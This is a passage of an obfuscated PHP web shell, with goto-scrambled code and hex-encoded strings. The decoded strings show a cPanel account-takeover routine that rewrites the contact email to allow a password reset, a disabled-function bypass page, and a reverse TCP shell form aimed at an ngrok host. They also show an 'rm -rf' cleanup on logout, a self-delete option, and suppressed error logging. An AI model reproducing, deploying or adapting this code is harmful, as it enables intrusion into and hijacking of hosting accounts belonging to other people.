"\x3c\57\164\x65\x78\164\x61\162\145\141\x3e\x3c\164\x61\142\154\145\x20\163\x74\x79\154\145\x3d\x22\x62\157\x72\144\145\x72\72\x31\160\x78\40\x73\157\x6c\151\x64\x20\x23\x30\60\x30\x30\60\x30\73\142\x61\x63\x6b\x67\x72\x6f\165\156\x64\55\x63\x6f\154\x6f\x72\x3a\x23\x30\x30\60\60\x30\x30\73\142\x6f\x72\144\145\162\55\164\x6f\160\x3a\x30\x70\x78\73\42\40\x63\145\154\x6c\x70\x61\144\x64\x69\156\147\x3d\x30\x20\143\x65\154\154\x73\160\x61\143\x69\156\x67\x3d\x30\40\167\x69\x64\164\150\x3d\42\61\x30\60\x25\42\x3e\74\164\162\x3e\74\x74\144\x20\163\x74\x79\154\145\x3d\42\x70\x61\144\x64\x69\x6e\x67\55\x6c\145\x66\x74\x3a\64\160\x78\73\40\167\x69\144\x74\150\x3a\61\x33\x70\170\x3b\x22\76\x24\74\x2f\x74\144\x3e\x3c\164\144\76\74\151\156\160\165\x74\x20\x74\171\x70\145\x3d\x74\145\170\164\40\156\x61\155\x65\x3d\143\155\x64\40\x73\164\171\x6c\x65\75\42\x62\x6f\x72\144\x65\x72\72\60\x70\x78\x3b\167\151\144\164\150\x3a\61\60\x30\x25\73\42\x20\157\156\x6b\x65\171\x64\157\167\x6e\x3d\42\153\x70\50\x65\x76\145\x6e\164\51\73\42\76\x3c\57\x74\x64\76\x3c\x2f\x74\x72\76\74\x2f\164\x61\x62\x6c\145\x3e";echo "\x3c\x2f\146\157\x72\x6d\76\74\57\144\151\166\x3e\74\x73\x63\x72\x69\x70\164\x3e\x64\56\143\146\56\143\155\144\56\x66\157\x63\x75\x73\50\51\73\74\57\163\143\162\151\160\164\76";hardFooter();}goto WKUxM;Akhyp:function actionCpanel(){hardHeader();echo "\74\143\x65\156\164\x65\x72\76\74\150\x31\x3e\x52\145\163\x65\x74\x20\103\x70\x61\156\145\154\x3c\x2f\150\x31\76\x3c\x64\151\x76\40\143\x6c\x61\x73\163\x3d\143\157\156\164\145\x6e\x74\76\74\142\162\76";echo "\x3c\x61\x20\150\162\x65\146\x3d\x22\x3f\x63\160\x61\x6e\145\x6c\143\150\141\156\147\x65\x72\x22\40\x74\141\162\147\x65\164\75\42\x5f\142\x6c\x61\156\153\x22\x3e\74\x69\156\160\165\x74\x20\x63\x6c\x61\x73\163\x3d\42\x63\165\x73\x74\x6f\155\x2d\164\157\157\x6c\163\55\142\165\x74\x74\157\156\x73\42\x20\x74\171\x70\145\75\42\163\165\x62\155\x69\164\x22\x20\x76\141\x6c\x75\x65\x3d\x22\x52\x65\163\145\164\42\x3e\74\57\x61\76";hardFooter();}goto w82DR;ExF9C:if(!isset($_COOKIE[sha1(md5($_SERVER["\x48\x54\124\120\137\x48\x4f\x53\x54"]))."\x61\x6a\141\170"])){$_COOKIE[sha1(md5($_SERVER["\x48\x54\x54\120\137\x48\117\x53\124"]))."\141\x6a\141\x78"]=(bool) $asciifnc1;}goto zA5El;TuU0I:if($os=="\167\151\x6e"){$home_cwd=str_replace("\x5c","\x2f",$home_cwd);$cwd=str_replace("\x5c","\57",$cwd);}goto jAXHO;J5SK5:if(strtolower(substr(PHP_OS,0,3))=="\x77\151\x6e"){$os="\167\151\156";}else{$os="\156\151\x78";}goto sHJzm;abTW4:function actionLogout(){exec("\x72\155\x20\x2d\162\146\x20\160\162\151\x76\137\163\171\155\x20\x70\x72\x69\166\137\x63\x67\x69\40\141\x64\x6d\x69\156\x65\x72\56\160\x68\160\40\x70\x72\x69\x76\137\x73\171\x6d\160\171");setcookie(sha1(md5($_SERVER["\x48\124\124\x50\x5f\x48\117\x53\124"])),'',time()-3600);die("\x3c\x73\x74\x79\154\145\76\xa\x62\157\x64\171\x20\x7b\142\x61\x63\153\147\162\x6f\165\x6e\x64\x2d\x63\x6f\154\157\x72\x3a\x23\x30\x30\60\60\x30\60\x3b\x20\40\175\40\x3c\x2f\x73\164\x79\154\x65\x3e\x3c\57\142\162\76\x3c\57\142\162\x3e\x3c\x62\157\x64\x79\x3e\x3c\160\x72\x65\40\x61\154\x69\x67\x6e\75\143\x65\156\x74\x65\x72\76\x3c\x66\157\162\x6d\x20\155\x65\x74\x68\x6f\x64\75\160\x6f\x73\x74\x20\163\164\171\154\x65\75\x27\x63\x6f\154\x6f\162\x3a\43\146\146\x66\x66\146\x66\x3b\x74\145\x78\164\x2d\141\154\151\147\x6e\72\x20\x63\x65\x6e\164\x65\162\x3b\x27\76\x62\171\x65\40\x62\x79\145\74\x62\x72\76\74\x62\x72\76\74\57\x66\157\x72\x6d\76\x20\x3c\57\x62\x6f\x64\x79\x3e");}goto f6EVW;gA0nc:function actiondisable(){hardHeader();echo "\74\143\145\156\164\x65\x72\x3e\x3c\150\x31\x3e\102\171\x70\141\x73\163\x3a\40\104\151\x73\141\142\x6c\145\144\x20\106\165\156\x63\164\151\x6f\x6e\163\x3c\x2f\150\x31\76\74\x64\151\166\x20\x63\154\x61\x73\x73\x3d\x63\x6f\156\164\x65\x6e\x74\x3e\x3c\x62\162\76";echo "\74\142\x72\76\x3c\143\145\156\164\145\162\x3e\40\x20\x3c\151\x66\x72\141\x6d\145\40\146\x72\x61\155\145\102\157\x72\x64\145\162\x3d\x30\x20\163\x72\143\75\47\77\144\x69\163\x61\142\154\x65\x64\47\40\167\151\144\164\x68\x3d\x27\x39\60\x30\47\x20\x68\145\x69\x67\150\164\75\x27\x33\x30\x30\47\x3e\x3c\57\151\146\x72\141\155\x65\76\x3c\57\x61\x3e";echo "\x3c\57\x64\x69\166\76";hardFooter();}goto Akhyp;Nr1jN:if(!function_exists("\x70\x6f\x73\x69\170\137\147\145\x74\x70\167\x75\151\x64")&&strpos($GLOBALS["\144\x69\163\141\142\x6c\145\x5f\146\x75\156\x63\x74\151\157\x6e\163"],"\x70\x6f\163\x69\170\x5f\147\145\x74\160\167\x75\x69\144")===false){function posix_getpwuid($p){return false;}}goto Of1wl;VVA1v:$asciifnc1=true;goto AXSyi;QouUw:ini_set("\144\x69\163\160\x6c\x61\171\137\x73\x74\141\x72\164\x75\x70\x5f\x65\x72\162\157\162\163",0);goto OilAS;f6EVW:function actionSelfRemove(){if($_POST["\x70\61"]=="\171\x65\x73"){if(@unlink(preg_replace("\x21\x5c\50\x5c\144\x2b\134\51\x5c\x73\56\x2a\x21",'',__FILE__))){die("\x53\x68\x65\x6c\154\x20\150\141\x73\40\x62\x65\145\x6e\40\162\x65\x6d\157\166\x65\x64");}else{echo "\165\156\154\151\x6e\153\x20\x65\162\x72\x6f\x72\x21";}}if($_POST["\x70\x31"]!="\x79\145\x73"){hardHeader();}echo "\74\x68\x31\x3e\123\x75\x69\x63\151\x64\145\74\57\x68\x31\x3e\x3c\x64\x69\x76\x20\x63\x6c\141\x73\163\x3d\143\x6f\x6e\x74\145\156\x74\76\122\145\141\x6c\x6c\171\x20\167\x61\x6e\x74\40\164\157\x20\162\x65\155\157\166\145\x20\x74\x68\x65\40\163\x68\x65\x6c\x6c\77\x3c\142\162\x3e\74\141\x20\150\162\145\x66\75\43\x20\x6f\156\x63\x6c\x69\x63\x6b\75\42\147\50\156\165\154\x6c\54\x6e\165\x6c\154\x2c\47\x79\x65\163\x27\51\x22\76\131\x65\x73\x3c\x2f\x61\x3e\x3c\x2f\144\151\x76\x3e";hardFooter();}goto hflHy;wVm3J:function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr='';$enc_str='';$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str)){break;}}}return base64_decode($enc_str);}goto uVFz3;OilAS:ini_set("\155\x61\170\137\x65\170\145\143\x75\164\x69\157\156\x5f\164\151\155\x65",0);goto qq4r6;TJJYv:if(empty($_POST["\143\150\141\162\x73\145\x74"])){$_POST["\x63\x68\141\x72\x73\145\164"]=$asciifnc2;}goto wgCev;w82DR:if(isset($_GET["\x63\x70\141\156\x65\x6c\x63\x68\141\156\x67\145\x72"])){echo "\74\x63\145\156\164\x65\162\x3e\74\150\x31\76\x52\145\163\145\164\40\103\160\141\156\x65\x6c\x3c\x2f\150\61\76\74\144\x69\x76\x20\x63\x6c\x61\163\x73\x3d\x63\157\x6e\x74\145\156\164\x3e\74\142\162\x3e";echo "\74\146\x6f\x72\x6d\40\x6d\x65\164\150\x6f\x64\75\x22\160\157\163\x74\42\40\164\141\x72\x67\x65\164\75\x22\x5f\142\x6c\141\156\x6b\x22\76\12\x3c\x69\156\160\x75\x74\40\164\x79\x70\x65\x3d\42\145\x6d\141\x69\x6c\x22\x20\156\x61\155\145\75\42\143\160\x61\156\x65\154\x65\155\141\151\154\x22\40\160\x6c\x61\x63\x65\150\157\x6c\x64\145\162\75\42\x73\165\x6e\x67\x6f\144\153\151\x6e\147\70\70\x40\147\155\x61\151\x6c\56\143\x6f\x6d\x22\40\166\x61\154\x75\145\75\42\163\x75\156\x67\157\144\x6b\151\156\147\70\70\x40\147\x6d\x61\151\154\56\x63\157\x6d\42\x3e\xa\x3c\151\156\x70\x75\x74\40\164\x79\x70\145\75\x22\x73\x75\x62\x6d\151\164\x22\x20\x6e\x61\x6d\x65\x3d\x22\143\160\141\x6e\x65\154\x63\x68\141\156\147\145\x22\40\166\x61\154\165\145\75\x22\x52\x65\163\145\164\40\x43\x70\x61\x6e\145\154\42\76\12\x3c\57\146\157\x72\x6d\x3e\74\142\x72\76\x3c\x62\162\x3e";$IIIIIIIIIIII=get_current_user();$IIIIIIIIIII1=$_SERVER["\x48\x54\x54\120\x5f\x48\x4f\x53\124"];$IIIIIIIIIIlI=getenv("\122\105\x4d\x4f\124\105\137\x41\104\x44\x52");if(isset($_POST["\x63\x70\x61\x6e\x65\x6c\x63\x68\x61\156\x67\145"])){$email=$_POST["\143\x70\x61\156\x65\154\145\155\141\151\154"];$IIIIIIIIIIl1="\x65\155\141\x69\x6c\72".$email;$IIIIIIIIII1I=fopen("\57\150\x6f\x6d\145\x2f".$IIIIIIIIIIII."\57\x2e\143\x70\141\156\x65\x6c\57\x63\157\156\164\x61\143\164\151\x6e\x66\157","\x77");fwrite($IIIIIIIIII1I,$IIIIIIIIIIl1);fclose($IIIIIIIIII1I);$IIIIIIIIII1I=fopen("\x2f\150\157\155\x65\57".$IIIIIIIIIIII."\x2f\x2e\143\157\156\164\x61\x63\164\151\156\x66\x6f","\x77");fwrite($IIIIIIIIII1I,$IIIIIIIIIIl1);fclose($IIIIIIIIII1I);$IIIIIIIIIlIl="\x68\x74\x74\160\163\x3a\57\x2f";$IIIIIIIIIlI1="\62\x30\x38\x33";$IIIIIIIIIllI=$IIIIIIIIIII1."\x3a\x32\60\70\x33\x2f\x72\145\163\x65\164\x70\141\x73\163\x23".$IIIIIIIIIIII.'';echo "\74\x63\145\x6e\164\x65\162\76\111\x6e\146\157\40\104\145\164\x61\151\x6c\72\40\74\x2f\x63\x65\x6e\164\145\x72\76";echo "\74\143\145\x6e\164\x65\162\76\74\151\156\x70\165\x74\40\x74\171\x70\x65\x3d\x22\164\x65\x78\164\x22\40\166\x61\x6c\x75\x65\x3d\42".$IIIIIIIIIlIl.''.$IIIIIIIIIII1."\72".$IIIIIIIIIlI1."\174".$IIIIIIIIIIII."\x7c\x22\x20\151\x64\x3d\42\x63\x70\x22\76\74\142\x75\x74\164\157\x6e\40\x6f\x6e\x63\154\x69\x63\153\x3d\42\143\160\146\165\x6c\x6c\x28\51\42\x3e\x43\157\x70\x79\40\164\145\x78\164\x3c\x2f\142\165\x74\x74\157\x6e\76\74\x2f\143\x65\x6e\164\145\162\76\12\x3c\163\143\162\x69\160\x74\76\x66\165\x6e\x63\x74\x69\157\156\x20\143\160\x66\x75\154\x6c\50\x29\x20\x7b\xa\166\x61\162\x20\143\x6f\160\171\x54\x65\170\164\x20\x3d\40\x64\x6f\143\x75\x6d\145\156\x74\x2e\147\x65\x74\x45\154\145\155\145\156\164\102\171\111\x64\x28\42\x63\x70\42\x29\73\12\143\157\160\171\x54\145\x78\164\56\163\x65\154\x65\x63\164\50\51\x3b\xa\144\157\x63\x75\155\145\x6e\x74\x2e\145\x78\x65\x63\103\x6f\x6d\155\x61\x6e\x64\x28\42\143\x6f\x70\x79\x22\x29\x3b\xa\x61\x6c\145\x72\164\50\42\x43\x6f\160\151\145\x64\41\x22\x29\73\xa\x7d\x3c\x2f\x73\x63\162\151\160\x74\76\xa";echo "\74\142\x72\x2f\x3e\x3c\143\145\x6e\164\x65\x72\76\x55\163\145\162\x3a\74\x62\162\57\76\74\151\156\x70\165\164\x20\164\x79\x70\145\75\x22\164\145\170\x74\42\x20\x76\x61\154\165\145\75\42".$IIIIIIIIIIII."\42\x20\151\144\75\42\x75\x73\145\x72\x22\76\12\x3c\x62\165\164\x74\157\x6e\x20\x6f\156\x63\154\x69\x63\x6b\x3d\42\165\x73\145\162\156\141\155\x65\50\x29\x22\x3e\x43\157\160\171\40\164\145\x78\164\x3c\57\x62\165\164\x74\x6f\156\76\x3c\57\x63\145\156\x74\145\x72\x3e\xa\74\163\143\x72\151\x70\x74\76\x66\x75\156\143\x74\x69\x6f\x6e\40\x75\x73\145\x72\156\x61\x6d\x65\x28\51\x20\173\xa\x76\x61\x72\40\143\x6f\160\171\124\x65\x78\x74\40\75\40\x64\157\143\165\x6d\x65\156\x74\56\147\x65\x74\105\x6c\x65\155\145\x6e\164\102\171\111\x64\50\42\165\163\x65\162\42\51\x3b\xa\143\x6f\160\171\124\145\170\x74\x2e\x73\x65\x6c\145\143\164\x28\51\x3b\xa\144\x6f\x63\165\155\145\156\164\x2e\145\170\145\143\x43\x6f\155\x6d\141\156\x64\x28\x22\143\157\x70\171\42\x29\73\xa\141\154\x65\x72\x74\x28\x22\103\157\x70\x69\145\144\41\x22\x29\x3b\xa\175\74\x2f\x73\x63\x72\151\160\164\76";echo "\x3c\x62\162\57\76\74\x63\145\156\164\x65\x72\76\74\x61\40\x74\x61\162\147\145\164\75\x22\137\x62\154\141\156\x6b\x22\40\150\x72\145\146\x3d\42".$IIIIIIIIIlIl.''.$IIIIIIIIIllI."\x22\x3e\122\105\x53\x45\x54\x3c\x2f\141\76\74\57\x63\145\x6e\x74\145\x72\76";}die;}goto KQnLx;dMy2L:ini_set("\x65\162\x72\x6f\x72\x5f\154\x6f\147",null);goto mPK0W;nVw6c:$asciifnc3="\106\151\154\x65\x73\115\141\x6e";goto gn4fB;yV96F:function prototype($k,$v){$_COOKIE[$k]=$v;setcookie($k,$v);}goto sww2V;Y4Cln:if(isset($_REQUEST["\x72\x65\166\x65\x72\163\x65\x70\x68\x70"])){echo "\x3c\x73\164\x79\x6c\x65\x3e\142\x6f\x64\x79\173\x62\141\143\x6b\x67\162\157\x75\x6e\x64\x2d\143\x6f\154\157\x72\x3a\43\x30\x36\x30\x61\61\60\x3b\143\x6f\154\157\162\72\43\145\x31\x65\x31\x65\61\73\155\x61\x72\x67\151\156\72\x30\73\146\157\156\164\72\156\x6f\162\155\141\x6c\40\67\x35\x25\40\101\x72\x69\x61\x6c\54\x48\145\x6c\x76\x65\164\151\x63\141\x2c\163\x61\156\163\55\163\145\x72\151\x66\175\x63\141\156\166\141\x73\173\144\151\163\x70\x6c\141\171\72\142\x6c\x6f\143\153\73\x76\145\162\164\x69\x63\x61\154\55\x61\x6c\151\147\156\72\142\x6f\164\x74\x6f\155\175\43\160\x61\162\164\151\x63\x6c\145\x73\55\x6a\163\173\x77\151\x64\x74\x68\72\x31\x30\60\45\x3b\150\x65\x69\x67\150\x74\72\x31\x30\x30\160\x78\73\142\141\143\x6b\147\162\x6f\165\x6e\144\55\143\157\x6c\x6f\x72\72\x23\x30\66\60\x61\x31\x30\x3b\x62\141\x63\153\x67\x72\157\165\156\144\55\151\155\141\x67\x65\72\165\x72\x6c\x28\x22\x22\51\x3b\x62\141\143\153\x67\162\157\x75\156\144\x2d\162\x65\160\145\141\x74\x3a\x6e\157\55\162\x65\160\x65\x61\x74\x3b\x62\141\x63\153\147\162\x6f\165\x6e\x64\x2d\163\151\172\145\72\x63\157\166\x65\162\73\x62\x61\143\153\x67\162\x6f\165\x6e\144\x2d\x70\x6f\x73\151\x74\x69\157\156\72\x35\x30\45\40\x35\60\45\175\142\x6f\144\x79\54\x74\144\x2c\164\150\173\146\157\156\164\x3a\x31\60\x70\164\40\164\141\x68\x6f\155\x61\54\141\162\x69\x61\154\x2c\x76\145\162\x64\x61\156\141\x2c\163\x61\156\163\55\x73\145\162\151\x66\54\x4c\x75\143\x69\x64\141\x20\123\x61\x6e\x73\x3b\155\141\x72\147\151\156\72\60\x3b\166\x65\x72\x74\x69\x63\x61\x6c\x2d\x61\154\151\x67\x6e\x3a\x74\157\160\x7d\x74\x61\142\154\x65\x2e\151\156\146\x6f\173\x63\157\154\157\162\x3a\x23\x63\x33\x63\x33\x63\63\175\164\141\x62\154\145\x23\x74\157\157\154\163\124\x62\x6c\x7b\142\x61\143\153\147\162\157\165\x6e\144\x2d\x63\157\x6c\x6f\x72\x3a\43\60\x36\x30\141\61\x30\175\141\54\150\x31\x2c\163\160\141\x6e\x7b\143\157\x6c\157\x72\72\43\146\x66\146\x21\151\x6d\160\157\162\164\141\156\x74\175\x73\160\141\x6e\x7b\146\x6f\156\x74\x2d\x77\145\x69\147\x68\x74\72\x62\x6f\x6c\144\145\x72\175\x68\61\x7b\142\157\162\144\x65\x72\55\154\145\146\x74\x3a\65\160\x78\40\163\157\x6c\x69\144\40\43\71\x63\71\70\62\145\73\x70\x61\144\144\x69\x6e\147\x3a\x32\x70\x78\x20\x35\x70\170\73\146\157\x6e\x74\72\x31\x34\x70\164\40\x56\x65\162\x64\141\x6e\141\x3b\142\x61\x63\153\x67\x72\157\165\x6e\x64\55\x63\x6f\x6c\x6f\x72\x3a\43\61\60\x31\65\61\x63\x3b\155\141\162\147\x69\156\x3a\60\x7d\x64\x69\166\x2e\x63\x6f\156\164\x65\156\164\173\160\x61\144\144\x69\156\147\x3a\x35\x70\170\73\155\141\162\x67\x69\156\55\x6c\145\146\164\x3a\65\x70\170\x3b\x62\141\x63\x6b\x67\162\x6f\x75\x6e\x64\55\x63\x6f\x6c\x6f\x72\72\x23\60\x36\60\x61\61\x30\175\141\173\x74\x65\x78\164\55\144\145\x63\157\162\x61\164\151\x6f\x6e\x3a\156\x6f\x6e\145\x7d\x61\x3a\x68\x6f\166\145\x72\173\164\145\170\x74\x2d\144\145\143\157\x72\x61\164\x69\x6f\156\72\165\156\x64\145\162\x6c\151\156\145\73\x63\157\154\157\x72\x3a\43\146\146\144\142\65\146\x21\x69\x6d\160\x6f\x72\x74\x61\x6e\x74\x7d\56\x74\x6f\x6f\x6c\x74\151\x70\x3a\72\141\x66\x74\145\162\x7b\142\141\x63\x6b\147\x72\x6f\x75\x6e\144\x3a\43\x30\x36\66\63\144\65\73\143\157\x6c\x6f\162\x3a\43\146\x66\x66\x3b\143\x6f\x6e\164\x65\156\x74\x3a\x61\x74\x74\x72\x28\x64\x61\x74\x61\x2d\x74\157\157\x6c\x74\151\x70\51\x3b\x6d\141\162\x67\x69\156\55\x74\157\160\x3a\55\x35\60\160\x78\73\144\151\x73\x70\x6c\x61\171\x3a\142\x6c\x6f\x63\x6b\73\x70\141\144\144\151\x6e\147\x3a\66\x70\x78\x20\61\60\x70\x78\x3b\160\x6f\163\x69\x74\151\157\x6e\72\141\x62\x73\157\x6c\165\164\x65\73\x76\x69\163\x69\x62\x69\154\151\x74\x79\x3a\x68\x69\x64\144\x65\x6e\x7d\x2e\164\x6f\x6f\x6c\x74\151\160\x3a\150\157\166\145\162\72\72\141\x66\x74\145\x72\173\x6f\160\x61\143\151\164\171\72\x31\x3b\166\x69\x73\x69\142\151\x6c\151\x74\x79\72\x76\151\x73\x69\x62\154\145\175\56\155\x6c\61\x7b\142\157\162\144\x65\x72\x3a\61\x70\170\x20\x73\x6f\x6c\x69\x64\x20\43\62\60\x32\x38\x33\62\x3b\x70\x61\144\x64\x69\156\147\x3a\x35\x70\x78\x3b\155\141\162\x67\151\156\72\x30\x3b\157\166\x65\x72\146\x6c\x6f\167\x3a\141\x75\164\x6f\175\56\x62\x69\147\x61\x72\145\141\x7b\x6d\x69\156\55\167\x69\144\x74\x68\x3a\61\x30\60\45\x3b\155\141\x78\55\167\151\144\x74\150\x3a\x31\x30\x30\45\73\x68\x65\151\147\x68\x74\72\x34\60\60\160\170\x7d\56\163\155\x61\154\154\173\x6d\151\x6e\x2d\167\151\144\x74\150\x3a\61\60\x30\45\73\155\141\170\55\167\x69\144\164\150\72\x31\60\x30\x25\73\150\x65\151\x67\x68\x74\x3a\x31\x30\60\160\x78\175\151\x6e\x70\x75\x74\54\x73\x65\x6c\145\143\x74\54\x74\145\x78\164\141\162\145\141\173\x6d\x61\162\147\x69\x6e\72\x30\73\x63\x6f\154\x6f\162\x3a\43\146\146\146\73\x62\141\143\x6b\x67\162\157\165\x6e\144\55\143\157\154\157\x72\72\x23\x32\x30\x32\x38\x33\62\x3b\x62\157\162\144\145\162\72\x6e\x6f\156\x65\73\x66\x6f\x6e\164\x3a\71\x70\164\x20\x43\x6f\x75\162\x69\145\x72\40\x4e\145\167\x3b\157\x75\164\x6c\x69\156\145\x3a\x30\175\x6c\141\142\x65\x6c\x7b\160\157\163\x69\164\151\157\x6e\x3a\162\x65\x6c\x61\164\x69\166\145\x7d\154\141\142\x65\x6c\x3a\x61\146\164\145\x72\173\143\157\156\x74\145\x6e\164\72\x22\74\x3e\42\73\x66\157\156\164\72\61\x30\160\x78\40\x43\157\156\163\x6f\154\x61\163\x2c\155\157\156\157\163\x70\x61\x63\x65\73\143\x6f\154\x6f\162\x3a\43\x66\x66\x66\73\55\167\x65\x62\x6b\x69\164\55\x74\x72\x61\156\x73\146\157\x72\155\72\162\157\164\141\164\145\50\x39\x30\144\145\x67\x29\73\x2d\x6d\157\172\x2d\x74\x72\141\156\x73\146\157\162\x6d\72\x72\157\164\141\164\145\x28\x39\x30\144\145\147\51\x3b\x2d\155\x73\x2d\164\x72\x61\156\163\x66\x6f\x72\155\x3a\x72\x6f\x74\141\x74\145\50\71\x30\144\145\x67\51\73\164\162\141\x6e\x73\x66\x6f\162\155\72\162\157\x74\141\x74\x65\x28\71\60\144\x65\147\51\73\162\151\147\x68\x74\x3a\63\160\x78\x3b\164\157\160\72\x33\160\170\73\x70\141\x64\x64\x69\x6e\x67\72\60\73\x70\157\x73\151\x74\151\x6f\156\x3a\x61\142\163\x6f\154\x75\164\145\73\x70\157\x69\x6e\164\145\162\x2d\145\166\x65\x6e\164\x73\72\x6e\x6f\156\145\x7d\154\141\x62\145\x6c\x3a\142\145\146\157\162\x65\173\143\x6f\x6e\164\x65\156\x74\x3a\42\x22\73\x72\151\x67\x68\x74\72\x30\x3b\x74\x6f\160\x3a\60\x3b\167\x69\x64\164\x68\72\61\67\160\170\73\150\x65\x69\147\x68\164\x3a\x31\x37\160\x78\x3b\x62\x61\143\x6b\147\x72\x6f\x75\156\144\72\x23\62\60\62\x38\63\x32\73\160\x6f\163\151\164\x69\157\156\72\x61\x62\x73\157\154\x75\164\145\x3b\160\157\x69\156\164\x65\x72\55\x65\x76\145\156\x74\x73\72\156\157\x6e\145\73\x64\151\x73\160\x6c\x61\171\72\x62\154\157\x63\153\x7d\146\x6f\162\155\x7b\155\141\x72\x67\151\156\72\x30\175\43\164\157\x6f\154\x73\x54\142\154\173\164\x65\170\164\x2d\141\154\x69\147\156\x3a\143\145\156\164\145\x72\175\x23\x66\141\153\x7b\142\x61\143\153\147\162\x6f\165\x6e\144\72\60\x20\x30\175\43\x66\x61\153\x20\x74\144\x7b\x70\x61\x64\x64\x69\x6e\147\x3a\65\160\170\x20\x30\x20\60\40\60\x7d\x69\x66\x72\x61\x6d\x65\x7b\142\x6f\x72\x64\x65\x72\72\x31\x70\170\40\x73\x6f\x6c\151\144\40\x23\x30\x36\60\x61\61\60\x7d\x2e\164\157\157\x6c\163\x49\156\160\x7b\167\151\144\x74\150\x3a\x33\60\x30\160\170\175\56\155\x61\x69\156\x20\164\150\x7b\x74\145\x78\164\x2d\x61\154\x69\147\x6e\72\x6c\x65\x66\x74\x3b\x62\x61\143\153\147\x72\157\x75\156\144\x2d\x63\x6f\x6c\x6f\x72\72\43\x30\x36\60\x61\x31\60\x7d\56\x6d\x61\x69\x6e\40\164\x72\x3a\150\157\166\x65\162\x7b\x62\x61\x63\x6b\x67\x72\157\x75\x6e\x64\55\x63\x6f\x6c\x6f\x72\72\43\x33\65\x34\62\x35\x32\175\x2e\155\x61\151\x6e\40\164\x64\54\x74\x68\173\x76\x65\162\164\151\143\141\154\x2d\141\154\151\x67\x6e\72\x6d\x69\x64\144\x6c\145\175\x69\156\160\x75\x74\133\164\x79\x70\145\x3d\x73\165\142\155\x69\x74\x5d\173\x62\141\143\153\x67\162\157\165\x6e\x64\55\143\157\154\157\162\x3a\x23\71\143\x39\70\x32\x65\175\151\156\x70\165\164\133\x74\x79\160\145\75\142\165\x74\x74\x6f\x6e\135\173\x62\141\143\x6b\147\162\157\165\x6e\144\x2d\x63\157\x6c\157\x72\x3a\43\71\x63\x39\70\x32\x65\x7d\151\x6e\x70\165\x74\x5b\164\171\x70\x65\75\163\165\142\155\x69\x74\x5d\72\x68\157\x76\x65\x72\173\x62\141\143\153\x67\x72\157\165\x6e\144\55\x63\x6f\154\157\x72\72\x23\x66\x66\144\142\x35\x66\175\x69\x6e\160\x75\164\x5b\164\171\160\145\x3d\x62\x75\164\x74\157\156\135\72\150\x6f\x76\145\162\x7b\x62\x61\x63\153\x67\162\x6f\x75\156\144\x2d\143\157\154\157\x72\72\x23\x66\x66\x64\x62\65\x66\x7d\x2e\x6c\61\x7b\142\141\x63\153\147\x72\x6f\165\156\x64\x2d\x63\x6f\x6c\157\162\x3a\x23\62\60\x32\70\x33\x32\x7d\x70\x72\145\x7b\x66\x6f\156\164\72\71\x70\164\40\103\157\165\x72\151\x65\x72\40\116\x65\167\x7d\151\156\x70\x75\164\x5b\x74\x79\x70\145\x3d\163\x75\142\x6d\151\x74\x5d\x2e\x63\165\163\164\157\155\55\164\157\x6f\154\x73\x2d\142\165\164\x74\157\x6e\x73\x7b\x66\157\x6e\164\x2d\x73\151\x7a\x65\x3a\61\64\x70\170\x21\151\155\x70\x6f\162\164\141\x6e\164\73\160\x61\144\144\x69\156\147\72\65\160\x78\x20\61\60\x70\170\41\x69\x6d\x70\x6f\162\164\141\156\164\73\x6d\141\162\147\x69\156\72\60\x20\65\160\170\41\151\155\160\x6f\162\x74\141\156\x74\73\146\x6f\156\164\55\167\x65\151\x67\x68\164\72\x37\60\x30\41\x69\155\x70\x6f\162\x74\x61\x6e\x74\73\143\x75\162\x73\157\x72\x3a\x70\157\151\156\x74\145\162\x21\151\x6d\x70\157\x72\164\x61\156\x74\x3b\x63\x6f\154\x6f\x72\x3a\x23\x65\61\x65\x31\145\61\x21\151\155\160\157\x72\164\141\156\x74\x3b\142\x61\x63\x6b\x67\x72\157\165\156\x64\55\143\157\x6c\x6f\162\x3a\43\60\66\60\141\61\x30\41\x69\155\x70\157\x72\164\x61\156\x74\73\x62\157\x72\x64\x65\x72\72\x31\160\x78\x20\x73\157\x6c\151\x64\40\43\71\143\71\x38\x32\x65\41\x69\x6d\x70\x6f\162\x74\141\x6e\164\x7d\151\156\x70\x75\164\133\164\x79\x70\145\x3d\x73\x75\142\155\x69\x74\135\56\143\165\163\164\x6f\155\55\x74\x6f\x6f\154\x73\x2d\142\x75\164\164\157\x6e\163\x3a\150\x6f\166\145\x72\x7b\142\x61\143\153\147\162\x6f\x75\156\x64\x2d\x63\x6f\154\x6f\x72\72\x23\x39\x63\x39\x38\x32\145\41\151\155\160\x6f\162\164\x61\x6e\164\175\x3c\57\163\164\x79\x6c\x65\x3e";echo "\74\x64\151\166\40\x73\x74\171\154\x65\x3d\x22\155\x61\162\147\151\156\72\63\x30\x70\x78\40\x32\x30\160\170\73\x22\76";echo "\74\x66\x6f\x72\x6d\40\155\x65\x74\150\157\144\75\x22\x70\157\x73\164\42\76";echo "\74\164\141\142\154\145\40\163\164\171\154\x65\x3d\142\x61\x63\x6b\147\x72\x6f\x75\156\144\x3a\x23\x32\x31\x32\x38\63\x32\41\x69\x6d\x70\157\x72\164\x61\x6e\x74\73\40\x63\154\141\163\163\x3d\x69\x6e\146\x6f\40\151\144\75\164\x6f\x6f\x6c\163\x54\142\154\40\143\x65\x6c\154\x70\141\144\x64\x69\x6e\x67\75\63\40\143\x65\x6c\x6c\163\160\x61\x63\151\156\147\x3d\60\x20\x77\x69\144\x74\x68\75\x31\60\x30\x25\76";echo "\74\164\150\145\141\144\76\x3c\143\x65\156\x74\145\x72\76\x3c\150\x33\x3e\x3c\163\x74\162\x6f\156\x67\x3e\107\x61\163\40\122\x65\166\145\162\163\x65\x20\x54\103\120\74\57\x73\x74\x72\157\x6e\147\76\x3c\x2f\150\x33\x3e\x3c\57\143\145\156\x74\x65\162\x3e\x3c\x2f\164\150\x65\x61\x64\x3e";echo "\x3c\164\x62\x6f\144\x79\76";echo "\x3c\x74\162\x3e\x3c\164\144\x3e";echo "\74\x69\156\160\x75\x74\x20\143\x6c\141\163\163\x3d\42\143\x75\x73\164\157\155\55\164\157\x6f\x6c\163\55\142\x75\164\164\157\156\163\42\40\x74\171\x70\x65\75\42\164\x65\170\164\42\x20\x6e\x61\155\x65\x3d\42\x6e\x67\162\x6f\153\151\x70\42\40\x70\x6c\141\x63\145\x68\x6f\154\144\145\x72\75\42\x32\56\164\143\x70\56\156\147\162\x6f\153\56\x69\x6f\x22\76";echo 